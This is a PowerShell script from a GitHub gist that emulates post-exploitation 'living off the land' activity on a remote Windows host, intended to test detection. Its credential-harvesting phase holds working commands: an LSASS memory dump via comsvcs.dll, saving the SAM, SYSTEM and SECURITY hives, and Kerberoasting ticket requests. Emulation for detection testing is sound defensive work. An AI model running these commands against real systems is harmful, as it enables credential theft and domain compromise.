-
-
Save lnfernux/bf55d498d74be6d655c1d12fafaf538f to your computer and use it in GitHub Desktop.
sectest.ps1 - only for testing purposes - a windows living of the land emulation script invoked remotely via pssession
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| .SYNOPSIS | |
| Windows Post-Exploitation Security Emulation Script | |
| Based on "Living Off the Land" techniques using only native Windows tools | |
| .DESCRIPTION | |
| This script emulates adversary post-exploitation activities using native Windows | |
| binaries and tools (LOLBINs/LOLBAS). It's designed to run on remote systems via | |
| PowerShell Remoting to test detection and monitoring capabilities. | |
| .PARAMETER TargetComputer | |
| The remote computer to run the emulation against | |
| .PARAMETER Credential | |
| Credentials to use for remote connection | |
| .PARAMETER OutputPath | |
| Local path where results will be saved (default: C:\SecurityEmulation) | |
| .PARAMETER SkipCredentialHarvesting | |
| Skip credential harvesting operations (LSASS dump, registry extraction) | |
| .PARAMETER SkipLateralMovement | |
| Skip lateral movement testing | |
| .EXAMPLE | |
| .\sectest.ps1 -TargetComputer "TARGET-PC" -Credential (Get-Credential) | |
| .\sectest.ps1 -TargetComputer "TARGET-PC" -Credential (Get-Credential) -HyperV | |
| .NOTES | |
| WARNING: This script performs activities that security tools may flag as malicious. | |
| Only run this in authorized security testing environments. | |
| Author: https://github.com/lnfernux @ infernux.no | |
| Version: 1.0 | |
| #> | |
| [CmdletBinding()] | |
| param( | |
| [Parameter(Mandatory=$true)] | |
| [string]$TargetComputer, | |
| [Parameter(Mandatory=$true)] | |
| [PSCredential]$Credential, | |
| [Parameter(Mandatory=$false)] | |
| [string]$OutputPath = "C:\SecurityEmulation", | |
| [Parameter(Mandatory=$false)] | |
| [switch]$SkipCredentialHarvesting, | |
| [Parameter(Mandatory=$false)] | |
| [switch]$SkipLateralMovement, | |
| [Parameter(Mandatory=$false)] | |
| [switch]$HyperV | |
| ) | |
| # Create output directory | |
| if (-not (Test-Path $OutputPath)) { | |
| New-Item -Path $OutputPath -ItemType Directory -Force | Out-Null | |
| } | |
| $timestamp = Get-Date -Format "yyyyMMdd_HHmmss" | |
| $logFile = Join-Path $OutputPath "emulation_log_$timestamp.txt" | |
| function Write-Log { | |
| param([string]$Message, [string]$Level = "INFO") | |
| $logMessage = "[$(Get-Date -Format 'yyyy-MM-dd HH:mm:ss')] [$Level] $Message" | |
| Write-Host $logMessage | |
| Add-Content -Path $logFile -Value $logMessage | |
| } | |
| function Test-RemoteConnection { | |
| param([string]$Computer, [PSCredential]$Cred) | |
| Write-Log "Testing connection to $Computer..." | |
| try { | |
| if($HyperV) { | |
| $testSession = New-PSSession -VMName $Computer -Credential $Cred -ErrorAction Stop | |
| Remove-PSSession $testSession | |
| Write-Log "Connection successful" -Level "SUCCESS" | |
| return $true | |
| } else { | |
| $testSession = New-PSSession -ComputerName $Computer -Credential $Cred -ErrorAction Stop | |
| Remove-PSSession $testSession | |
| Write-Log "Connection successful" -Level "SUCCESS" | |
| return $true | |
| } | |
| } catch { | |
| Write-Log "Connection failed: $_" -Level "ERROR" | |
| return $false | |
| } | |
| } | |
| # ============================================================================ | |
| # PHASE 1: INITIAL RECONNAISSANCE AND ENUMERATION | |
| # ============================================================================ | |
| function Invoke-InitialReconnaissance { | |
| param([System.Management.Automation.Runspaces.PSSession]$Session) | |
| Write-Log "=== PHASE 1: INITIAL RECONNAISSANCE ===" -Level "INFO" | |
| $results = Invoke-Command -Session $Session -ScriptBlock { | |
| $output = @{} | |
| # System Information | |
| $os = Get-WmiObject -Class Win32_OperatingSystem | |
| $output['OSInfo'] = $os | Select-Object Caption, Version, BuildNumber, OSArchitecture, LastBootUpTime | |
| # Check if domain-joined | |
| $cs = Get-WmiObject -Class Win32_ComputerSystem | |
| $output['DomainInfo'] = @{ | |
| PartOfDomain = $cs.PartOfDomain | |
| Domain = $cs.Domain | |
| Name = $cs.Name | |
| } | |
| # Current user privileges | |
| $output['UserInfo'] = whoami /all | |
| # Local users | |
| $output['LocalUsers'] = Get-LocalUser | Select-Object Name, Enabled, LastLogon, PasswordLastSet | |
| # Local administrators | |
| $output['LocalAdmins'] = Get-LocalGroupMember -Group "Administrators" -ErrorAction SilentlyContinue | |
| # Running processes | |
| $output['Processes'] = Get-Process | Select-Object ProcessName, Id, Path -First 50 | Sort-Object ProcessName | |
| # Services running as SYSTEM | |
| $output['SystemServices'] = Get-WmiObject win32_service | | |
| Where-Object {$_.StartName -eq "LocalSystem" -and $_.State -eq "Running"} | | |
| Select-Object Name, PathName, State -First 20 | |
| # Unquoted service paths | |
| $output['UnquotedServices'] = Get-WmiObject win32_service | Where-Object { | |
| $_.PathName -notlike '"*' -and $_.PathName -like '* *' | |
| } | Select-Object Name, PathName, StartName, State | |
| # Network configuration | |
| $output['NetworkConfig'] = Get-NetIPConfiguration | Select-Object InterfaceAlias, IPv4Address, IPv4DefaultGateway, DNSServer | |
| # Established connections | |
| $output['Connections'] = Get-NetTCPConnection | Where-Object {$_.State -eq "Established"} | | |
| Select-Object LocalAddress, LocalPort, RemoteAddress, RemotePort -First 20 | |
| # ARP cache | |
| $output['ARPCache'] = Get-NetNeighbor | Where-Object {$_.State -ne "Unreachable" -and $_.State -ne "Incomplete"} | | |
| Select-Object IPAddress, State -First 20 | |
| # Installed software (64-bit) | |
| $output['InstalledSoftware'] = Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | | |
| Select-Object DisplayName, DisplayVersion, Publisher -First 30 | | |
| Where-Object {$_.DisplayName -ne $null} | |
| # Security products | |
| $output['SecurityProducts'] = Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct -ErrorAction SilentlyContinue | | |
| Select-Object displayName, pathToSignedProductExe, productState | |
| return $output | |
| } | |
| # Save results | |
| $results | ConvertTo-Json -Depth 5 | Out-File (Join-Path $OutputPath "01_reconnaissance_$timestamp.json") | |
| Write-Log "Reconnaissance complete. Results saved." | |
| return $results | |
| } | |
| # ============================================================================ | |
| # PHASE 2: ACTIVE DIRECTORY ENUMERATION | |
| # ============================================================================ | |
| function Invoke-ADEnumeration { | |
| param([System.Management.Automation.Runspaces.PSSession]$Session) | |
| Write-Log "=== PHASE 2: ACTIVE DIRECTORY ENUMERATION ===" -Level "INFO" | |
| $results = Invoke-Command -Session $Session -ScriptBlock { | |
| $output = @{} | |
| # Check if domain-joined first | |
| $cs = Get-WmiObject -Class Win32_ComputerSystem | |
| if (-not $cs.PartOfDomain) { | |
| return @{Error = "System is not domain-joined"} | |
| } | |
| # Domain information using .NET | |
| try { | |
| $domain = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain() | |
| $output['DomainInfo'] = @{ | |
| Name = $domain.Name | |
| Forest = $domain.Forest.Name | |
| DomainControllers = $domain.DomainControllers | ForEach-Object { $_.Name } | |
| } | |
| } catch { | |
| $output['DomainInfoError'] = $_.Exception.Message | |
| } | |
| # Native tools enumeration | |
| # nltest - Domain controllers and trusts | |
| $output['nltest_dclist'] = nltest /dclist:$env:USERDNSDOMAIN 2>&1 | |
| $output['nltest_trusts'] = nltest /domain_trusts 2>&1 | |
| # net commands | |
| $output['net_domainadmins'] = net group "Domain Admins" /domain 2>&1 | |
| $output['net_domaincontrollers'] = net group "Domain Controllers" /domain 2>&1 | |
| $output['net_passwordpolicy'] = net accounts /domain 2>&1 | |
| # ADSI queries for users with SPNs (Kerberoasting targets) | |
| try { | |
| $searcher = [ADSISearcher]"(&(servicePrincipalName=*)(UserAccountControl:1.2.840.113556.1.4.803:=512))" | |
| $searcher.PropertiesToLoad.AddRange(@("samaccountname","serviceprincipalname","pwdlastset")) | |
| $searcher.PageSize = 100 | |
| $spnUsers = $searcher.FindAll() | ForEach-Object { | |
| @{ | |
| Username = $_.Properties['samaccountname'][0] | |
| SPN = $_.Properties['serviceprincipalname'][0] | |
| PasswordLastSet = if ($_.Properties['pwdlastset'].Count -gt 0) { | |
| [DateTime]::FromFileTime($_.Properties['pwdlastset'][0]) | |
| } else { $null } | |
| } | |
| } | |
| $output['KerberoastableAccounts'] = $spnUsers | |
| } catch { | |
| $output['KerberoastError'] = $_.Exception.Message | |
| } | |
| # setspn enumeration | |
| $output['setspn_all'] = setspn -Q */* 2>&1 | Select-Object -First 50 | |
| # Users with passwords never expire | |
| try { | |
| $searcher = [ADSISearcher]"(&(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=65536))" | |
| $searcher.PageSize = 100 | |
| $neverExpire = $searcher.FindAll() | ForEach-Object { | |
| $_.Properties['samaccountname'][0] | |
| } | |
| $output['PasswordNeverExpire'] = $neverExpire | |
| } catch { | |
| $output['PasswordNeverExpireError'] = $_.Exception.Message | |
| } | |
| # Find domain computers | |
| try { | |
| $searcher = [ADSISearcher]"(objectClass=computer)" | |
| $searcher.PropertiesToLoad.AddRange(@("name","operatingsystem")) | |
| $searcher.PageSize = 100 | |
| $computers = $searcher.FindAll() | ForEach-Object { | |
| @{ | |
| Name = $_.Properties['name'][0] | |
| OS = if ($_.Properties['operatingsystem'].Count -gt 0) { | |
| $_.Properties['operatingsystem'][0] | |
| } else { "Unknown" } | |
| } | |
| } | Select-Object -First 50 | |
| $output['DomainComputers'] = $computers | |
| } catch { | |
| $output['DomainComputersError'] = $_.Exception.Message | |
| } | |
| # dsquery if available | |
| $dsqueryAvailable = Get-Command dsquery -ErrorAction SilentlyContinue | |
| if ($dsqueryAvailable) { | |
| $output['dsquery_domainadmins'] = dsquery group -name "Domain Admins" | dsget group -members 2>&1 | |
| } | |
| return $output | |
| } | |
| # Save results | |
| $results | ConvertTo-Json -Depth 5 | Out-File (Join-Path $OutputPath "02_ad_enumeration_$timestamp.json") | |
| Write-Log "Active Directory enumeration complete. Results saved." | |
| return $results | |
| } | |
| # ============================================================================ | |
| # PHASE 3: CREDENTIAL HARVESTING | |
| # ============================================================================ | |
| function Invoke-CredentialHarvesting { | |
| param([System.Management.Automation.Runspaces.PSSession]$Session) | |
| Write-Log "=== PHASE 3: CREDENTIAL HARVESTING ===" -Level "WARNING" | |
| Write-Log "WARNING: This phase performs sensitive operations that will trigger security alerts!" | |
| $results = Invoke-Command -Session $Session -ScriptBlock { | |
| $output = @{} | |
| $tempPath = "C:\Windows\Temp" | |
| # Check privileges | |
| $isAdmin = ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator) | |
| $output['IsAdmin'] = $isAdmin | |
| if ($isAdmin) { | |
| # LSASS Memory Dump using comsvcs.dll | |
| try { | |
| $lsassPid = (Get-Process lsass).Id | |
| $dumpPath = "$tempPath\lsass_$((Get-Date).Ticks).dmp" | |
| $output['LSASS_DumpAttempt'] = @{ | |
| PID = $lsassPid | |
| DumpPath = $dumpPath | |
| Timestamp = Get-Date | |
| } | |
| # This is the actual LSASS dump - HIGHLY DETECTABLE | |
| $result = rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump $lsassPid $dumpPath full 2>&1 | |
| if (Test-Path $dumpPath) { | |
| $output['LSASS_DumpSuccess'] = $true | |
| $output['LSASS_DumpSize'] = (Get-Item $dumpPath).Length | |
| # Clean up immediately | |
| Remove-Item $dumpPath -Force -ErrorAction SilentlyContinue | |
| $output['LSASS_DumpCleaned'] = $true | |
| } else { | |
| $output['LSASS_DumpSuccess'] = $false | |
| } | |
| } catch { | |
| $output['LSASS_DumpError'] = $_.Exception.Message | |
| } | |
| # Registry Hive Extraction | |
| try { | |
| $samPath = "$tempPath\sam_$((Get-Date).Ticks).hive" | |
| $systemPath = "$tempPath\system_$((Get-Date).Ticks).hive" | |
| $securityPath = "$tempPath\security_$((Get-Date).Ticks).hive" | |
| reg save HKLM\SAM $samPath /y 2>&1 | Out-Null | |
| reg save HKLM\SYSTEM $systemPath /y 2>&1 | Out-Null | |
| reg save HKLM\SECURITY $securityPath /y 2>&1 | Out-Null | |
| $output['RegistryHives'] = @{ | |
| SAM = Test-Path $samPath | |
| SYSTEM = Test-Path $systemPath | |
| SECURITY = Test-Path $securityPath | |
| } | |
| # Clean up | |
| Remove-Item $samPath -Force -ErrorAction SilentlyContinue | |
| Remove-Item $systemPath -Force -ErrorAction SilentlyContinue | |
| Remove-Item $securityPath -Force -ErrorAction SilentlyContinue | |
| } catch { | |
| $output['RegistryHivesError'] = $_.Exception.Message | |
| } | |
| } else { | |
| $output['AdminRequiredWarning'] = "Administrator privileges required for credential harvesting" | |
| } | |
| # PowerShell History Mining (works without admin) | |
| try { | |
| $historyPath = (Get-PSReadlineOption).HistorySavePath | |
| if (Test-Path $historyPath) { | |
| $history = Get-Content $historyPath | Select-String -Pattern "password|credential|secret|api" -CaseSensitive:$false | |
| $output['PowerShellHistory'] = @{ | |
| HistoryPath = $historyPath | |
| SuspiciousEntries = $history.Count | |
| Samples = $history | Select-Object -First 5 | |
| } | |
| } | |
| } catch { | |
| $output['PowerShellHistoryError'] = $_.Exception.Message | |
| } | |
| # Search for credential files | |
| try { | |
| $credFiles = @() | |
| # Unattended install files | |
| $credFiles += Get-ChildItem C:\Windows\Panther\ -Recurse -Include unattend.xml,autounattend.xml -ErrorAction SilentlyContinue | | |
| Select-Object FullName, Length | |
| # VNC files | |
| $credFiles += Get-ChildItem C:\ -Recurse -Include ultravnc.ini,vnc.ini -ErrorAction SilentlyContinue -Depth 3 | | |
| Select-Object FullName, Length | |
| # FileZilla | |
| $credFiles += Get-ChildItem C:\Users\*\AppData\Roaming\FileZilla\ -Include sitemanager.xml,recentservers.xml -ErrorAction SilentlyContinue | | |
| Select-Object FullName, Length | |
| $output['CredentialFiles'] = $credFiles | |
| } catch { | |
| $output['CredentialFilesError'] = $_.Exception.Message | |
| } | |
| # Credential Manager | |
| try { | |
| $output['CredentialManager'] = cmdkey /list 2>&1 | |
| } catch { | |
| $output['CredentialManagerError'] = $_.Exception.Message | |
| } | |
| # Kerberos tickets | |
| try { | |
| $output['KerberosTickets'] = klist 2>&1 | |
| } catch { | |
| $output['KerberosTicketsError'] = $_.Exception.Message | |
| } | |
| return $output | |
| } | |
| # Save results | |
| $results | ConvertTo-Json -Depth 5 | Out-File (Join-Path $OutputPath "03_credential_harvesting_$timestamp.json") | |
| Write-Log "Credential harvesting complete. Results saved." | |
| return $results | |
| } | |
| # ============================================================================ | |
| # PHASE 4: KERBEROASTING EMULATION | |
| # ============================================================================ | |
| function Invoke-Kerberoasting { | |
| param([System.Management.Automation.Runspaces.PSSession]$Session) | |
| Write-Log "=== PHASE 4: KERBEROASTING EMULATION ===" -Level "INFO" | |
| $results = Invoke-Command -Session $Session -ScriptBlock { | |
| $output = @{} | |
| # Find accounts with SPNs | |
| try { | |
| $searcher = [ADSISearcher]"(&(servicePrincipalName=*)(UserAccountControl:1.2.840.113556.1.4.803:=512))" | |
| $searcher.PropertiesToLoad.AddRange(@("samaccountname","serviceprincipalname")) | |
| $spnAccounts = $searcher.FindAll() | |
| if ($spnAccounts.Count -gt 0) { | |
| Add-Type -AssemblyName System.IdentityModel | |
| $tickets = @() | |
| foreach ($account in $spnAccounts) { | |
| $spn = $account.Properties['serviceprincipalname'][0] | |
| $username = $account.Properties['samaccountname'][0] | |
| try { | |
| # Request TGS ticket | |
| $ticket = New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $spn | |
| $tickets += @{ | |
| Username = $username | |
| SPN = $spn | |
| TicketRequested = $true | |
| Timestamp = Get-Date | |
| } | |
| } catch { | |
| $tickets += @{ | |
| Username = $username | |
| SPN = $spn | |
| TicketRequested = $false | |
| Error = $_.Exception.Message | |
| } | |
| } | |
| } | |
| $output['RequestedTickets'] = $tickets | |
| # List cached tickets | |
| $output['CachedTickets'] = klist 2>&1 | |
| } else { | |
| $output['Message'] = "No Kerberoastable accounts found" | |
| } | |
| } catch { | |
| $output['Error'] = $_.Exception.Message | |
| } | |
| return $output | |
| } | |
| # Save results | |
| $results | ConvertTo-Json -Depth 5 | Out-File (Join-Path $OutputPath "04_kerberoasting_$timestamp.json") | |
| Write-Log "Kerberoasting emulation complete. Results saved." | |
| return $results | |
| } | |
| # ============================================================================ | |
| # PHASE 5: LATERAL MOVEMENT TESTING | |
| # ============================================================================ | |
| function Invoke-LateralMovementTest { | |
| param( | |
| [System.Management.Automation.Runspaces.PSSession]$Session, | |
| [PSCredential]$Cred | |
| ) | |
| Write-Log "=== PHASE 5: LATERAL MOVEMENT TESTING ===" -Level "INFO" | |
| $results = Invoke-Command -Session $Session -ScriptBlock { | |
| $output = @{} | |
| # Get list of potential targets from ARP cache | |
| $targets = Get-NetNeighbor | Where-Object { | |
| $_.State -eq "Reachable" -and $_.AddressFamily -eq "IPv4" | |
| } | Select-Object -First 5 -ExpandProperty IPAddress | |
| $output['PotentialTargets'] = $targets | |
| # Test WinRM connectivity to targets | |
| $winrmTests = @() | |
| foreach ($target in $targets) { | |
| try { | |
| $testResult = Test-WSMan -ComputerName $target -ErrorAction Stop | |
| $winrmTests += @{ | |
| Target = $target | |
| WinRMAvailable = $true | |
| } | |
| } catch { | |
| $winrmTests += @{ | |
| Target = $target | |
| WinRMAvailable = $false | |
| } | |
| } | |
| } | |
| $output['WinRMTests'] = $winrmTests | |
| # WMI connectivity tests | |
| $wmiTests = @() | |
| foreach ($target in $targets) { | |
| try { | |
| $os = Get-WmiObject -Class Win32_OperatingSystem -ComputerName $target -ErrorAction Stop | |
| $wmiTests += @{ | |
| Target = $target | |
| WMIAvailable = $true | |
| OS = $os.Caption | |
| } | |
| } catch { | |
| $wmiTests += @{ | |
| Target = $target | |
| WMIAvailable = $false | |
| } | |
| } | |
| } | |
| $output['WMITests'] = $wmiTests | |
| return $output | |
| } | |
| # Save results | |
| $results | ConvertTo-Json -Depth 5 | Out-File (Join-Path $OutputPath "05_lateral_movement_$timestamp.json") | |
| Write-Log "Lateral movement testing complete. Results saved." | |
| return $results | |
| } | |
| # ============================================================================ | |
| # PHASE 6: LOLBIN/LOLBAS TECHNIQUES | |
| # ============================================================================ | |
| function Invoke-LOLBINTechniques { | |
| param([System.Management.Automation.Runspaces.PSSession]$Session) | |
| Write-Log "=== PHASE 6: LOLBIN/LOLBAS TECHNIQUES ===" -Level "INFO" | |
| $results = Invoke-Command -Session $Session -ScriptBlock { | |
| $output = @{} | |
| $tempPath = "C:\Windows\Temp" | |
| # certutil - File download simulation | |
| try { | |
| $testUrl = "http://www.google.com/robots.txt" | |
| $testFile = "$tempPath\certutil_test_$((Get-Date).Ticks).txt" | |
| certutil -urlcache -split -f $testUrl $testFile 2>&1 | Out-Null | |
| $output['certutil_download'] = @{ | |
| Success = Test-Path $testFile | |
| TestFile = $testFile | |
| } | |
| Remove-Item $testFile -Force -ErrorAction SilentlyContinue | |
| } catch { | |
| $output['certutil_error'] = $_.Exception.Message | |
| } | |
| # bitsadmin - File download simulation | |
| try { | |
| $testUrl = "http://www.google.com/robots.txt" | |
| $testFile = "$tempPath\bitsadmin_test_$((Get-Date).Ticks).txt" | |
| bitsadmin /transfer testjob /download /priority high $testUrl $testFile 2>&1 | Out-Null | |
| $output['bitsadmin_download'] = @{ | |
| Success = Test-Path $testFile | |
| TestFile = $testFile | |
| } | |
| Remove-Item $testFile -Force -ErrorAction SilentlyContinue | |
| } catch { | |
| $output['bitsadmin_error'] = $_.Exception.Message | |
| } | |
| # wmic - Process enumeration | |
| try { | |
| $output['wmic_processes'] = wmic process get name,processid,commandline 2>&1 | Select-Object -First 20 | |
| } catch { | |
| $output['wmic_error'] = $_.Exception.Message | |
| } | |
| # sc - Service enumeration | |
| try { | |
| $output['sc_query'] = sc query 2>&1 | Select-Object -First 30 | |
| } catch { | |
| $output['sc_error'] = $_.Exception.Message | |
| } | |
| # reg query - Registry enumeration | |
| try { | |
| $output['reg_run_keys'] = reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run 2>&1 | |
| $output['reg_runonce_keys'] = reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce 2>&1 | |
| } catch { | |
| $output['reg_error'] = $_.Exception.Message | |
| } | |
| # schtasks - Scheduled tasks enumeration | |
| try { | |
| $output['schtasks'] = schtasks /query /fo LIST /v 2>&1 | Select-Object -First 50 | |
| } catch { | |
| $output['schtasks_error'] = $_.Exception.Message | |
| } | |
| # tasklist - Process listing | |
| try { | |
| $output['tasklist'] = tasklist /v 2>&1 | Select-Object -First 30 | |
| } catch { | |
| $output['tasklist_error'] = $_.Exception.Message | |
| } | |
| # netstat - Network connections | |
| try { | |
| $output['netstat'] = netstat -ano 2>&1 | Select-Object -First 30 | |
| } catch { | |
| $output['netstat_error'] = $_.Exception.Message | |
| } | |
| # ipconfig - Network configuration | |
| try { | |
| $output['ipconfig'] = ipconfig /all 2>&1 | |
| } catch { | |
| $output['ipconfig_error'] = $_.Exception.Message | |
| } | |
| # arp - ARP table | |
| try { | |
| $output['arp_table'] = arp -a 2>&1 | |
| } catch { | |
| $output['arp_error'] = $_.Exception.Message | |
| } | |
| # route - Routing table | |
| try { | |
| $output['route_print'] = route print 2>&1 | |
| } catch { | |
| $output['route_error'] = $_.Exception.Message | |
| } | |
| # systeminfo - System information | |
| try { | |
| $output['systeminfo'] = systeminfo 2>&1 | |
| } catch { | |
| $output['systeminfo_error'] = $_.Exception.Message | |
| } | |
| return $output | |
| } | |
| # Save results | |
| $results | ConvertTo-Json -Depth 5 | Out-File (Join-Path $OutputPath "06_lolbin_techniques_$timestamp.json") | |
| Write-Log "LOLBIN/LOLBAS techniques complete. Results saved." | |
| return $results | |
| } | |
| # ============================================================================ | |
| # MAIN EXECUTION | |
| # ============================================================================ | |
| Write-Log "========================================" | |
| Write-Log "Windows Security Emulation Script" | |
| Write-Log "Target: $TargetComputer" | |
| Write-Log "Output: $OutputPath" | |
| Write-Log "========================================" | |
| # Test connection | |
| if (-not (Test-RemoteConnection -Computer $TargetComputer -Cred $Credential)) { | |
| Write-Log "Cannot establish connection to target. Exiting." -Level "ERROR" | |
| exit 1 | |
| } | |
| # Create persistent session | |
| Write-Log "Creating persistent PSSession..." | |
| try { | |
| if($HyperV) { | |
| $session = New-PSSession -VMName $TargetComputer -Credential $Credential -ErrorAction Stop | |
| } else { | |
| $session = New-PSSession -ComputerName $TargetComputer -Credential $Credential -ErrorAction Stop | |
| } | |
| Write-Log "Session established successfully" | |
| } catch { | |
| Write-Log "Failed to create PSSession: $_" -Level "ERROR" | |
| exit 1 | |
| } | |
| try { | |
| # Phase 1: Reconnaissance | |
| $reconResults = Invoke-InitialReconnaissance -Session $session | |
| # Phase 2: AD Enumeration | |
| if ($reconResults.DomainInfo.PartOfDomain) { | |
| $adResults = Invoke-ADEnumeration -Session $session | |
| } else { | |
| Write-Log "Target is not domain-joined. Skipping AD enumeration." | |
| } | |
| # Phase 3: Credential Harvesting | |
| if (-not $SkipCredentialHarvesting) { | |
| Write-Host "`nWARNING: About to perform credential harvesting operations." -ForegroundColor Yellow | |
| Write-Host "These operations are HIGHLY DETECTABLE and may trigger security alerts." -ForegroundColor Yellow | |
| $confirm = Read-Host "Continue? (yes/no)" | |
| if ($confirm -eq "yes") { | |
| $credResults = Invoke-CredentialHarvesting -Session $session | |
| } else { | |
| Write-Log "Credential harvesting skipped by user" | |
| } | |
| } | |
| # Phase 4: Kerberoasting | |
| if ($reconResults.DomainInfo.PartOfDomain -and -not $SkipCredentialHarvesting) { | |
| $kerbResults = Invoke-Kerberoasting -Session $session | |
| } | |
| # Phase 5: Lateral Movement | |
| if (-not $SkipLateralMovement) { | |
| $lateralResults = Invoke-LateralMovementTest -Session $session -Cred $Credential | |
| } | |
| # Phase 6: LOLBIN Techniques | |
| $lolbinResults = Invoke-LOLBINTechniques -Session $session | |
| Write-Log "========================================" | |
| Write-Log "Security emulation complete!" | |
| Write-Log "Results saved to: $OutputPath" | |
| Write-Log "========================================" | |
| } catch { | |
| Write-Log "Error during execution: $_" -Level "ERROR" | |
| } finally { | |
| # Clean up session | |
| if ($session) { | |
| Remove-PSSession $session | |
| Write-Log "PSSession closed" | |
| } | |
| } | |
| # Generate summary report | |
| $summary = @" | |
| ====================================== | |
| SECURITY EMULATION SUMMARY | |
| ====================================== | |
| Target Computer: $TargetComputer | |
| Execution Time: $(Get-Date) | |
| Output Path: $OutputPath | |
| PHASES EXECUTED: | |
| [X] Phase 1: Initial Reconnaissance | |
| [X] Phase 2: Active Directory Enumeration | |
| $( if (-not $SkipCredentialHarvesting) { "[X]" } else { "[ ]" } ) Phase 3: Credential Harvesting | |
| $( if (-not $SkipCredentialHarvesting) { "[X]" } else { "[ ]" } ) Phase 4: Kerberoasting | |
| $( if (-not $SkipLateralMovement) { "[X]" } else { "[ ]" } ) Phase 5: Lateral Movement Testing | |
| [X] Phase 6: LOLBIN/LOLBAS Techniques | |
| All results have been saved as JSON files in: | |
| $OutputPath | |
| Review the log file for detailed execution information: | |
| $logFile | |
| ====================================== | |
| "@ | |
| Write-Host $summary | |
| $summary | Out-File (Join-Path $OutputPath "execution_summary_$timestamp.txt") |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment